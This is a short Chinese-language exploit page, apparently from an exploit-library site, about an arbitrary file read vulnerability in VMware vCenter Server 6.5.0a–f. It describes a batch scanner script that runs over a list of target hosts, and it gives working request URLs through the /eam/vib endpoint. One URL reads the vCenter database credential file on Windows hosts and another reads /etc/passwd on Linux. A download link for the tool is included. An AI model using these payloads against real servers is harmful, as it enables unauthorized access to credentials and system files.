## 漏洞概述
VMware vCenter特定版本存在任意文件读取漏洞,攻击者通过构造特定的请求,可以读取服务器上任意文件
## 影响范围
“`http
VMware vCenter Server 6.5.0a- f 版本
“`
## POC
“`bash
urls.txt用于存放目标HOST,然后直接运行此脚本即可 python vCenter-info-leak.py
漏洞验证成功的目标存放于success.txt,连接失败的错误信息存放于error.txt中
“`
## EXP
[@佩奇文库](http://wiki.peiqi.tech)
**Windows主机**
“`
http://xxx.xxx.xxx.xxx/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
“`
![image.png](/media/editor/image_20210718115429311162.png)
**Linux主机**
“`
https://xxx.xxx.xxx.xxx/eam/vib?id=/etc/passwd
“`
![image.png](/media/editor/image_20210718115446214546.png)
## POC
[点我下载](/Gr33kLibrary/download_tool/87/)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容